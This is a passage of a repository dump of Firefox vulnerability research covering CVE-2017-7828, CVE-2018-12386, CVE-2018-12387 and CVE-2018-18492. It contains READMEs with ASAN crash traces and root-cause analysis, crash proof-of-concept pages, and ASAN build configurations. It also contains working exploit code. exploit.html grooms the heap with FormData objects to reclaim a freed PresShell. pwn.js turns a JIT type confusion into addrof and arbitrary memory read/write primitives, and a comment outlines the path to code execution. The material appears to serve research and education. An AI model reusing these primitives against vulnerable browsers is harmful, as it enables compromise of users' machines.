49 | Upon returning to the original context of the ```nsComputedDOMStyle``` object, it does not know ```mPresShell``` has been freed.
50 | 
51 | ## Where the dangling pointer is dereferenced
52 | 
53 | The PoC then returns to ```nsComputedDOMStyle::GetPropertyCSSValue``` (see Figure 1), in Line 1039, 
54 | 
55 | ```val = (this->*getter)();```, where the getter points to ```DoGetWidth()```:
56 | 
57 | ![](images/image5.png)
58 | 
59 | Within ```nsComputedDOMStyle::DoGetWidth```, it calls ```mInnerFrame->GetContentRect()```
60 | 
61 | ```mInnerFrame``` is an instance of ```mozilla::nsIFrame```. It can access a ```PresContext``` object which contains freed ```PresShell``` object. Then within its method, it uses the ```PresShell``` object, which causes ASAN to report.
62 | 
63 | The PoC then crashes with the following stack trace:
64 | 
65 | ```
66 |  #0 0x7f43f69ce18c in nsIFrame::GetUsedBorderAndPadding() const /home/ug16zy2/firefox-56.0/layout/generic/nsIFrame.h:1301:12
67 |     #1 0x7f43f69ce18c in nsIFrame::GetContentRectRelativeToSelf() const /home/ug16zy2/firefox-56.0/layout/generic/nsFrame.cpp:1434
68 |     #2 0x7f43f69ce18c in nsIFrame::GetContentRect() const /home/ug16zy2/firefox-56.0/layout/generic/nsFrame.cpp:1444
69 |     #3 0x7f43f64e612d in nsComputedDOMStyle::DoGetWidth() /home/ug16zy2/firefox-56.0/layout/style/nsComputedDOMStyle.cpp:5106:35
70 |     #4 0x7f43f64b1a12 in nsComputedDOMStyle::GetPropertyCSSValue(nsAString const&, mozilla::ErrorResult&) /home/ug16zy2/firefox-56.0/layout/style/nsComputedDOMStyle.cpp:1039:11
71 | ```
72 | 
73 | ## Exploitation
74 | We can of cause exploit dereferences happening after the callback and before ```nsComputedDOMStyle::GetPropertyCSSValue``` returns but it is really limited. As the dangling pointer is ```mPresShell``` of an ```nsComputedDOMStyle``` object, I am not sure whether it can be used again under our control (with JS code) if we manage to avoid crashing before parser takes next line of JS code.
75 | 
76 | 
77 | ## Reference 
78 | 
79 | [Bug Report](https://bugzilla.mozilla.org/show_bug.cgi?id=1406750)


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7828/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function spin () {
 3 |     var x=new XMLHttpRequest();
 4 |     x.open("POST","https://mozilla.org",false);
 5 |     try{x.send("X");}catch(e){}
 6 | }
 7 | function start() {
 8 | 	o147=document.documentElement;
 9 | 	o200=o147.querySelector('*:not([id])');
10 | 	o243=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
11 | 	o243.src='scripts.html';
12 | 	document.documentElement.appendChild(o243);
13 | }
14 | function fun0(doc) {
15 | 	o519=doc;
16 | 	o527=o519.querySelector('*:not([id])');
17 | 	o593=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
18 | 	o200.appendChild(o593);
19 | }
20 | function fun1() {
21 | 	spin();
22 | }
23 | function fun2() {
24 | 	o200.setAttribute('style','all: unset');
25 | 	o697=o593.contentWindow;
26 | 	o698=o697.document;
27 | 	document.documentElement.appendChild(o698.replaceChild(o519.documentElement,o698.documentElement));
28 | 	o593.contentWindow.onresize=fun3;
29 | }
30 | function fun3() {
31 | 	document.documentElement.appendChild(o200);
32 | 	window.top.document.documentElement.appendChild(o527);
33 | }
34 | </script>
35 | <body onload="start()"></body>
36 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7828/exploit.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | var formdatas = new Array(4000);
 3 | 
 4 | function spin () {
 5 |     var x=new XMLHttpRequest();
 6 |     x.open("POST","https://mozilla.org",false);
 7 |     try{x.send("X");}catch(e){}
 8 | }
 9 | 
10 | function go() {
11 | 	for (i = 0; i < formdatas.length; i++) {
12 | 		formdatas[i] = new FormData();
13 | 	}
14 | 	for (var i = 0; i < formdatas.length; i++) {
15 | 		// 43 appends will cause FormData's internal array "mFormData" to re-allocate itself into a 0x1000 allocation
16 | 		for (var j = 0; j < 44-1; j++) {
17 | 			formdatas[i].append(null, null);
18 | 		}
19 | 	}	
20 | }
21 | 
22 | function formdata_append_one(f) {
23 | 	f.append(null, null);
24 | }
25 | function formdata_delete_all(f) {
26 | 	f.delete(null);
27 | }
28 | 
29 | function start() {
30 | 	Math.tan(1);
31 | 	o147=document.documentElement;
32 | 	o200=o147.querySelector('*:not([id])');
33 | 	o243=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
34 | 	o243.src='scripts.html';
35 | 	document.documentElement.appendChild(o243);
36 | 	// allocating 4000 formdata
37 | 	go()
38 | 	// reallocate mFormdata in each formdata to bigger allocation
39 | 	for (var i = 0; i < formdatas.length; i++) {
40 | 		formdata_append_one(formdatas[i]);
41 | 	}
42 | 	Math.tan(1);
43 | }
44 | function fun0(doc) {
45 | 	o519=doc;
46 | 	o527=o519.querySelector('*:not([id])');
47 | 	o593=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
48 | 	o200.appendChild(o593);
49 | 	Math.sin(1);
50 | }
51 | function fun1() {
52 | 	spin();
53 | }
54 | function fun2() {
55 | 	Math.sin(1);
56 | 	o200.setAttribute('style','all: unset');
57 | 	o697=o593.contentWindow;
58 | 	o698=o697.document;
59 | 	document.documentElement.appendChild(o698.replaceChild(o519.documentElement,o698.documentElement));
60 | 	o593.contentWindow.onresize=fun3;
61 | 	// before new PresSell is allocated: poke holes
62 | 	for (var i = 300; i < formdatas.length; i += 550) {
63 | 		formdata_delete_all(formdatas[i]);
64 | 	}
65 | 	Math.sin(1);
66 | }
67 | function fun3() {
68 | 	setTimeout(function() {
69 | 		Math.atan(1);
70 | 
71 | 	}, 1000);
72 | 	// free all formdatas
73 | 	for (var i = 0; i < formdatas.length; i++) {
74 | 			formdata_delete_all(formdatas[i]);
75 | 	}
76 | 	FuzzingFunctions.garbageCollect();
77 | 	FuzzingFunctions.cycleCollect();
78 | 	FuzzingFunctions.garbageCollect();
79 | 	FuzzingFunctions.cycleCollect();
80 | 	Math.cos(1);
81 | 	document.documentElement.appendChild(o200);
82 | 	window.top.document.documentElement.appendChild(o527);
83 | 	Math.cos(1);
84 | 
85 | }
86 | </script>
87 | <body onload="start()"></body>
88 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7828/images/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2017-7828/images/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7828/images/crash.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2017-7828/images/crash.png


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7828/images/image1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2017-7828/images/image1.png


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7828/images/image2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2017-7828/images/image2.png


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7828/images/image3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2017-7828/images/image3.png


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7828/images/image4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2017-7828/images/image4.png


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7828/images/image5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2017-7828/images/image5.png


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7828/mozconfig:
--------------------------------------------------------------------------------
 1 | mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/objdir-ff-asan
 2 | 
 3 | export LLVM_CONFIG="/usr/bin/llvm-config"
 4 | 
 5 | # Enable ASan specific code and build workarounds
 6 | ac_add_options --enable-address-sanitizer
 7 | 
 8 | export CC=/usr/bin/clang
 9 | export CXX=/usr/bin/clang++
10 | 
11 | # Add ASan to our compiler flags
12 | export CFLAGS="-fsanitize=address -Dxmalloc=myxmalloc -fPIC"
13 | export CXXFLAGS="-fsanitize=address -Dxmalloc=myxmalloc -fPIC"
14 | 
15 | export LDFLAGS="-fsanitize=address"
16 | 
17 | # These three are required by ASan
18 | ac_add_options --disable-jemalloc
19 | ac_add_options --disable-crashreporter
20 | ac_add_options --disable-elf-hack
21 | 
22 | # Keep symbols to symbolize ASan traces later
23 | export MOZ_DEBUG_SYMBOLS=1
24 | ac_add_options --enable-debug-symbols
25 | ac_add_options --disable-install-strip
26 | 
27 | ac_add_options --enable-optimize=-O2
28 | ac_add_options --disable-debug
29 | 
30 | ac_add_options --disable-profiling
31 | ac_add_options --enable-tests
32 | 
33 | # fuzzing
34 | ac_add_options --enable-fuzzing
35 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7828/scripts.html:
--------------------------------------------------------------------------------
 1 | <marquee id='id8' >
 2 | <script>
 3 | window.top.fun0(document);
 4 | </script>
 5 | <style>
 6 | ::first-line { 
 7 | </style>
 8 | <script>
 9 | window.top.fun1();
10 | </script>
11 | <script>
12 | window.top.fun2();
13 | </script>
14 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7828/user.js:
--------------------------------------------------------------------------------
 1 | user_pref("browser.shell.checkDefaultBrowser", false);
 2 | user_pref("general.warnOnAboutConfig", false);
 3 | user_pref("fuzzing.enabled", true);
 4 | user_pref("browser.tabs.remote.autostart", false);
 5 | user_pref("browser.tabs.remote.autostart.2", false);
 6 | user_pref("security.sandbox.content.level", 1);
 7 | user_pref("toolkit.startup.max_resumed_crashes", -1);
 8 | user_pref("browser.startup.page", 0);
 9 | user_pref("browser.shell.checkDefaultBrowser", false);
10 | user_pref("browser.sessionstore.resume_from_crash", false);
11 | user_pref("browser.tabs.warnOnOpen", false);
12 | user_pref("browser.tabs.warnOnClose", false);
13 | user_pref("security.insecure_field_warning.contextual.enabled", false);
14 | user_pref("security.insecure_password.ui.enabled", false);


--------------------------------------------------------------------------------
/Firefox/CVE-2018-12386/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-12386/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2018-12386/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2018-12386
 2 | 
 3 | ## Firefox RCE from Hack2Win
 4 | 
 5 | **Firefox version verified with:** 57.0
 6 | 
 7 | **Type:** Type confusion -> RCE
 8 | 
 9 | Steps to reproduce:
10 | 
11 | - run ```gdb --args ./js/src/build_DBG.OBJ/dist/bin/js --no-threads --fuzzing-safe ../CVE-2018-12386/crash.js```
12 | 
13 | It gives an assetion failure with debug build of js shell:
14 | 
15 | ```
16 | Assertion failure: *def->output() != alloc, at /home/clover/firefox-57.0/js/src/jit/RegisterAllocator.cpp:222
17 | 
18 | Thread 1 "js" received signal SIGSEGV, Segmentation fault.
19 | 
20 | ```
21 | 
22 | Exploitation:
23 | 
24 | R/W primitive:
25 | 
26 | (with a debug build of js shell)
27 | 
28 | - run ```gdb --args ./js/src/build_OPT.OBJ/dist/bin/js --no-threads --fuzzing-safe ../CVE-2018-12386/pwn.js```
29 | 
30 | 
31 | Reference
32 | 
33 | [1] https://bugzilla.mozilla.org/show_bug.cgi?id=1493900


--------------------------------------------------------------------------------
/Firefox/CVE-2018-12386/crash.js:
--------------------------------------------------------------------------------
 1 | // Generate objects with inline properties
 2 | for (var i = 0; i < 100; i++)
 3 |  var o1 = {s: "asdf", x: new Uint8Array(0x20)};
 4 | for (var i = 0; i < 100; i++)
 5 |   var o2 = {s: "asdf", y: 13.37};
 6 | 
 7 | function f(a, b) {
 8 |   let p = b;
 9 |   for (; p.s < 0; p = p.s)
10 |     while (p === p) {}
11 |   for (var i = 0; i < 10000000; ++i) {} //JIT compilation
12 | 
13 |   /*
14 |   This code will be compiled such that in the last statement, when the inline property
15 |   x of a is accessed, it will actually access the inline property y of b due to the
16 |   register misallocation and the fact that x and y are stored at the same offset in the
17 |   objects
18 |   */
19 |   // JIT thinks it returns a Uint8Array, but actually returns a double
20 |   return a.x;
21 | }
22 | 
23 | f(o1, o2);
24 | f(o1, o2);
25 | res = f(o1,o2);
26 | console.log(res[0]);


--------------------------------------------------------------------------------
/Firefox/CVE-2018-12386/pwn.js:
--------------------------------------------------------------------------------
  1 | var convert = new ArrayBuffer(0x100);
  2 | var u32 = new Uint32Array(convert);
  3 | var f64 = new Float64Array(convert);
  4 | 
  5 | var BASE = 0x100000000;
  6 | 
  7 | function hex(x) {
  8 |     return `0x${x.toString(16)}`
  9 | }
 10 | 
 11 | function bytes_to_u64(bytes) {
 12 |     return (bytes[0]+bytes[1]*0x100+bytes[2]*0x10000+bytes[3]*0x1000000
 13 |                 +bytes[4]*0x100000000+bytes[5]*0x10000000000);
 14 | }
 15 | 
 16 | function i2f(x) {
 17 |     u32[0] = x % BASE;
 18 |     u32[1] = (x - (x % BASE)) / BASE;
 19 |     return f64[0];
 20 | }
 21 | 
 22 | function f2i(x) {
 23 |     f64[0] = x;
 24 |     return u32[0] + BASE * u32[1];
 25 | }
 26 | 
 27 | function fail(msg) {
 28 |     print("FAIL " + msg);
 29 |     throw null;
 30 | }
 31 | 
 32 | function setup() {
 33 |     var container = {a: {}};
 34 |     var master = new Float64Array(0x100);
 35 |     var victim = new Uint8Array(0x100);
 36 | 
 37 |     var objs = [];
 38 |     for (var i = 0; i < 100; i++) {
 39 |         let x = {x: 13.37, y:victim, z:container};
 40 |         objs[i] = {x: 'asd', p1: {}, p2: {}, p3: {}, p4: x, p5: x, p6: {}};
 41 |     }
 42 |     var o = objs[0];
 43 |     var a = new Float64Array(1024);
 44 | 
 45 |     function f(a, b) {
 46 |         let p = b;
 47 |         for (; p.x < 0; p = p.x)
 48 |             while (p === p) {}
 49 |         for (var i = 0; i < 10000000; ++i){ }
 50 |         if (action==1) {
 51 |             victim_addr_f = a[3];
 52 |             container_addr_f = a[4];
 53 |         } else {
 54 |             a[7] = victim_addr_f;
 55 |         }
 56 |     }
 57 | 
 58 |     action = 1;
 59 |     for (var j = 0; j < 5; ++j)
 60 |         f(a, o);
 61 | 
 62 |     var victim_addr = f2i(victim_addr_f);
 63 |     var container_addr = f2i(container_addr_f);
 64 |     //print('victim @ ' + hex(victim_addr) + ' / container @ ' + hex(container_addr));
 65 | 
 66 |     var objs = [];
 67 |     for (var i = 0; i < 100; i++) {
 68 |         objs[i] = {x: 'asd', p1: {}, p2: {}, p3: {}, p4: {}, p5: master};
 69 |     }
 70 |     var o = objs[0];
 71 | 
 72 |     action = 2;
 73 |     for (var j = 0; j < 5; ++j)
 74 |         f(a, o);
 75 | 
 76 |     function set_addr(where) {
 77 |         master[7] = i2f(where);
 78 |     }
 79 | 
 80 |     function read64(where) {
 81 |         set_addr(where);
 82 |         var res = 0;
 83 |         for (var i = 7; i >= 0; --i) {
 84 |             res = res*0x100 + victim[i];
 85 |         }
 86 |         return res;
 87 |     }
 88 | 
 89 |     function read48(where) {
 90 |         set_addr(where);
 91 |         var res = 0;
 92 |         for (var i = 5; i >= 0; --i) {
 93 |             res = res*0x100 + victim[i];
 94 |         }
 95 |         return res;
 96 |     }
 97 | 
 98 |     function write64(where, what) {
 99 |         set_addr(where);
100 |         for (var i = 0; i < 8; ++i) {
101 |             victim[i] = what%0x100;
102 |             what = (what-what%0x100)/0x100;
103 |         }
104 |     }
105 | 
106 |     function addrof2(x) {
107 |         container.a = x;
108 |         return read48(container_addr + 0x20);
109 |     }
110 | 
111 |     function check() {
112 |         print('master/victim: ' + hex(addrof2(master)) + ' ' + hex(addrof2(victim)));
113 |     }
114 | 
115 |     function test() {
116 |         var x = {x:0x1337};
117 |         print(addrof2(x)+0x20);
118 |         if (read48(addrof2(x)+0x20)%0x10000 != 0x1337) {
119 |             check();
120 |             fail("R/W does not work");
121 |         } else
122 |           print("R/W works!")
123 |     }
124 | 
125 |     function crash() {
126 |         var x = 1.384706273005e-312; // 0x0000004141414141
127 |         var ix = f2i(x);
128 |         read48(ix);
129 |     }
130 | 
131 |     return {
132 |         addrof: addrof2,
133 |         read64: read64,
134 |         write64: write64,
135 |         read48: read48,
136 |         check: check,
137 |         test: test,
138 |         crash: crash,
139 |     };
140 | }
141 | 
142 | function pwn() {
143 |     var mem = setup();
144 |     // r/w primitive
145 |     mem.test();
146 |     // read mem 0x0000004141414141
147 |     mem.crash(); // crash
148 | }
149 | 
150 | pwn();
151 | 
152 | 
153 | /*
154 | For RCE, a DOM object with a vtable is then corrupted and a virtual function called
155 | on it. From there a small ROP chain is triggered which loads the shellcode and
156 | jumps into it
157 | */
158 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-12387/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-12387/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2018-12387/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2018-12387
 2 | 
 3 | ## Infoleak bug from Hack2Win
 4 | 
 5 | **Firefox version verified with:** 57.0 (ASAN build)
 6 | 
 7 | ## Crash:
 8 | 
 9 | run ```./mach run --debug --disable-e10s --ion-eager ../CVE-2018-12387/crash.html```
10 | 
11 | gives:
12 | 
13 | ```
14 | ==2407==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000009 (pc 0x7fffe55b4feb bp 0x7ffffffe60f0 sp 0x7ffffffe5d60 T0)
15 | ==2407==The signal is caused by a READ memory access.
16 | ==2407==Hint: address points to the zero page.
17 |     #0 0x7fffe55b4fea in JSObject::getClass() const /home/clover/firefox-57.0/js/src/jsobj.h:104
18 |     #1 0x7fffe55b4fea in JSObject::getOpsGetProperty() const /home/clover/firefox-57.0/js/src/jsobj.h:116
19 |     #2 0x7fffe55b4fea in js::GetProperty(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /home/clover/firefox-57.0/js/src/vm/NativeObject.h:1588
20 | 
21 | ```
22 | 
23 | ## Exploitation
24 | 
25 | According to https://bugzilla.mozilla.org/show_bug.cgi?id=1493903
26 | This can lead to a info leak exploitation that gets XUL base address, stack and heap addresses.
27 | 
28 | 
29 | Reference:
30 | 
31 | [1] https://ssd-disclosure.com/archives/3766
32 | 
33 | [2] https://bugzilla.mozilla.org/show_bug.cgi?id=1493903
34 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-12387/crash.html:
--------------------------------------------------------------------------------
1 | <html>
2 | <body>
3 | 
4 | <script src="./crash.js"> </script>
5 | </body>


--------------------------------------------------------------------------------
/Firefox/CVE-2018-12387/crash.js:
--------------------------------------------------------------------------------
 1 | function f(o) {
 2 |  var a = [o];
 3 |  a.length = a[0];
 4 |  var useless = function() {
 5 |  }
 6 |  var sz = Array.prototype.push.call(a, 42, 43);
 7 |  (function(){
 8 |  sz;
 9 |  })(new Boolean(false));
10 | }
11 | for (var i = 0; i < 25000; i++) {
12 |  f(1);
13 | }
14 | f(2);


--------------------------------------------------------------------------------
/Firefox/CVE-2018-18492/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-18492/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2018-18492/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2018-18492
 2 | 
 3 | A use-after-free vulnerability can occur after deleting a selection element due to a weak reference to the select element in the options collection. This results in a potentially exploitable crash. This vulnerability affects Thunderbird < 60.4, Firefox ESR < 60.4, and Firefox < 64.
 4 | 
 5 | ## Firefox
 6 | 
 7 | I tested this vulnerability with Firefox 63.0.3 ASAN+Fuzzing build downloaded from [here](https://ftp.mozilla.org/pub/firefox/releases/63.0.3/source/). The mozconfig I used is [here](https://github.com/ZihanYe/Firefox-Exploitation/blob/master/Manual%20Exploitation/CVE-2018-18492/mozconfig).
 8 | 
 9 | To build it, I had to downgrade my rust to 1.28.0 according to [Firefox's Rust Update policy](https://wiki.mozilla.org/Rust_Update_Policy_for_Firefox).
10 | 
11 | In order for making Firefox opening the PoC file without any other disruption, I used some customized preferences. Preferences can be set in ```about:config``` page in Firefox by searching for preferences listed in [user.js](https://github.com/ZihanYe/Firefox-Exploitation/blob/master/Manual%20Exploitation/CVE-2018-18492/user.js), or if you are running Firefox in headless mode (```--headless```), then create a new profile like this:
12 | 
13 | ```
14 | mkdir -p /path/to/firefox/build/directory/tmp/customized_profile
15 | ```
16 | and move [user.js]() under the new profile folder.
17 | 
18 | Run firefox with options ```--headless --no-remote --profile /path/to/the/profile/folder/just/created file:///path/to/crash.html```
19 | 
20 | 
21 | ## PoC
22 | 
23 | ![](images/crash.png)
24 | 
25 | The vulnerability happens when ```o995=o577.add(o651);``` is executed. When adding o651 to o577, we want to remove ```o651``` from its old parent o261, which trigger the callback function registered with ```DOMNodeRemoved``` event. In the callback function, we set a couple of things to null and force garbage collection, when returning to the original context, there are dangling pointers.
26 | 
27 | ## Where the free is triggered
28 | 
29 | In Line 3 and 5, an ```HTMLSelectElement``` object A and an ```HTMLOptionsCollection``` object B is created, corresponding to o260 and o577 respectively.
30 | 
31 | ```o995=o577.add(o651);``` calls underlying C++ function ```HTMLOptionsCollection::Add```:
32 | 
33 | ![](images/image1.png)
34 | 
35 | Its ```mSelect``` points to ```HTMLSelectElement``` object A (associated with o260). ```mSelect->Add``` is called. Within ```Add```, it calls ```AppendChild``` (Line 580) and results in the following stack trace:
36 | 
37 | ![](images/image3.png)
38 | 
39 | Note that all these functions are functions of A itself. ```this``` is still pointing to object A. Inside function ```nsINode::ReplaceOrInsertBefore```, it check if the node about to be inserted has an parent already, if so, it firstly remove the node from Children list of its old parent. This is where a node is removed (Line 2320) and event 'DOMNodeRemoved' is triggered.
40 | 
41 | ![](images/image4.png)
42 | 
43 | Then within the callback function, A (i.e o260 in Javascript) is freed. However we still return to the original context, that is, ```ReplaceOrInsertBefore``` of A. The screenshot below illustrates the vulnerability:
44 | 
45 | ![](images/image5.png)
46 | 
47 | At this point, ```this``` is a dangling pointer. ASAN reports when it access other data inside the object afterwards.
48 | 
49 | ```
50 | READ of size 8 at 0x612000225068 thread T0
51 |     #0 0x7f20456d1ad3 in nsINode::IsDocument() const /home/ug16zy2/firefox-63.0.3/dom/base/nsINode.h:418
52 |     #1 0x7f20456d1ad3 in IsAllowedAsChild /home/ug16zy2/firefox-63.0.3/dom/base/nsINode.cpp:2120
53 |     #2 0x7f20457f5898 in nsINode::EnsurePreInsertionValidity2(bool, nsINode&, nsINode*, mozilla::ErrorResult&) /home/ug16zy2/firefox-63.0.3/dom/base/nsINode.cpp:2269
54 |     #3 0x7f20457f5898 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&) /home/ug16zy2/firefox-63.0.3/dom/base/nsINode.cpp:2335
55 |     #4 0x7f2048be24b9 in nsINode::InsertBefore(nsINode&, nsINode*, mozilla::ErrorResult&) /home/ug16zy2/firefox-63.0.3/dom/base/nsINode.h:1798
56 |     #5 0x7f2048be24b9 in nsINode::AppendChild(nsINode&, mozilla::ErrorResult&) /home/ug16zy2/firefox-63.0.3/dom/base/nsINode.h:1802
57 |     #6 0x7f2048be24b9 in mozilla::dom::HTMLSelectElement::Add(nsGenericHTMLElement&, nsGenericHTMLElement*, mozilla::ErrorResult&) /home/ug16zy2/firefox-63.0.3/dom/html/HTMLSelectElement.cpp:580
58 | ```
59 | 
60 | ## Exploitation
61 | 
62 | As on Javascript level, o260 has been set to null, so there should be no way to access any pointer to the underlying ```HTMLSelectElement```. We can exploit dereferences happening after returning from the callback and before ```HTMLSelectElement::Add``` returns, as "this" pointer still points to the freed object.
63 | 
64 | 
65 | ## Reference:
66 | 
67 | [1] [Bug Report](https://bugzilla.mozilla.org/show_bug.cgi?id=1499861)
68 | 
69 | 
70 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-18492/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function start() {
 3 |     o260=document.createElementNS('http://www.w3.org/1999/xhtml','select');
 4 |     o261=document.createElementNS('http://www.w3.org/1999/xhtml','optgroup');
 5 | 	o577=o260.options;
 6 | 	o651=document.createElementNS('http://www.w3.org/1999/xhtml','optgroup');
 7 | 	o261.appendChild(o651);
 8 | 	o261.addEventListener('DOMNodeRemoved',fun0);
 9 | 	o995=o577.add(o651);
10 | }
11 | function fun0() {
12 | 	o260=null;o261=null;o651=null;
13 | 	FuzzingFunctions.garbageCollect();
14 | 	FuzzingFunctions.cycleCollect();
15 | 	FuzzingFunctions.garbageCollect();
16 | 	FuzzingFunctions.cycleCollect();
17 | }
18 | </script>
19 | <body onload="start()"></body>
20 | 
21 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-18492/images/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-18492/images/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2018-18492/images/crash.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-18492/images/crash.png


--------------------------------------------------------------------------------
/Firefox/CVE-2018-18492/images/image1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-18492/images/image1.png


--------------------------------------------------------------------------------
/Firefox/CVE-2018-18492/images/image2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-18492/images/image2.png


--------------------------------------------------------------------------------
/Firefox/CVE-2018-18492/images/image3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-18492/images/image3.png


--------------------------------------------------------------------------------
/Firefox/CVE-2018-18492/images/image4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-18492/images/image4.png


--------------------------------------------------------------------------------
/Firefox/CVE-2018-18492/images/image5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-18492/images/image5.png


--------------------------------------------------------------------------------
/Firefox/CVE-2018-18492/mozconfig:
--------------------------------------------------------------------------------
 1 | #for debug with asan build and jitspew
 2 | 
 3 | # Combined .mozconfig file for ASan on Linux+Mac
 4 | 
 5 | mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/objdir-ff-asan
 6 | 
 7 | # Enable ASan specific code and build workarounds
 8 | ac_add_options --enable-address-sanitizer
 9 | 
10 | # Add ASan to our compiler flags
11 | export CFLAGS="-fsanitize=address -U_FORTIFY_SOURCE -Dxmalloc=myxmalloc -fPIC"
12 | export CXXFLAGS="-fsanitize=address -U_FORTIFY_SOURCE -Dxmalloc=myxmalloc -fPIC"
13 | 
14 | # Additionally, we need the ASan flag during linking. Normally, our C/CXXFLAGS would
15 | # be used during linking as well but there is at least one place in our build where
16 | # our CFLAGS are not added during linking.
17 | # Note: The use of this flag causes Clang to automatically link the ASan runtime :)
18 | export LDFLAGS="-fsanitize=address -Wl,--no-as-needed -ldl"
19 | 
20 | # These three are required by ASan
21 | ac_add_options --disable-jemalloc
22 | ac_add_options --disable-crashreporter
23 | ac_add_options --disable-elf-hack
24 | 
25 | # Keep symbols to symbolize ASan traces later
26 | export MOZ_DEBUG_SYMBOLS=1
27 | ac_add_options --enable-debug-symbols
28 | ac_add_options --disable-install-strip
29 | 
30 | # Settings for an opt build (preferred)
31 | # The -gline-tables-only ensures that all the necessary debug information for ASan
32 | # is present, but the rest is stripped so the resulting binaries are smaller.
33 | ac_add_options --enable-optimize=-O2
34 | ac_add_options --disable-debug
35 | 
36 | # Settings for a debug build
37 | # ac_add_options --disable-optimize
38 | # ac_add_options --enable-debug
39 | 
40 | ac_add_options --enable-valgrind
41 | ac_add_options --disable-profiling
42 | ac_add_options --enable-tests
43 | 
44 | # fuzzing
45 | ac_add_options --enable-fuzzing


--------------------------------------------------------------------------------
/Firefox/CVE-2018-18492/user.js:
--------------------------------------------------------------------------------
 1 | user_pref("browser.shell.checkDefaultBrowser", false);
 2 | user_pref("general.warnOnAboutConfig", false);
 3 | user_pref("fuzzing.enabled", true);
 4 | user_pref("browser.tabs.remote.autostart", false);
 5 | user_pref("security.sandbox.content.level", 1);
 6 | user_pref("toolkit.startup.max_resumed_crashes", -1);
 7 | user_pref("browser.startup.page", 0);
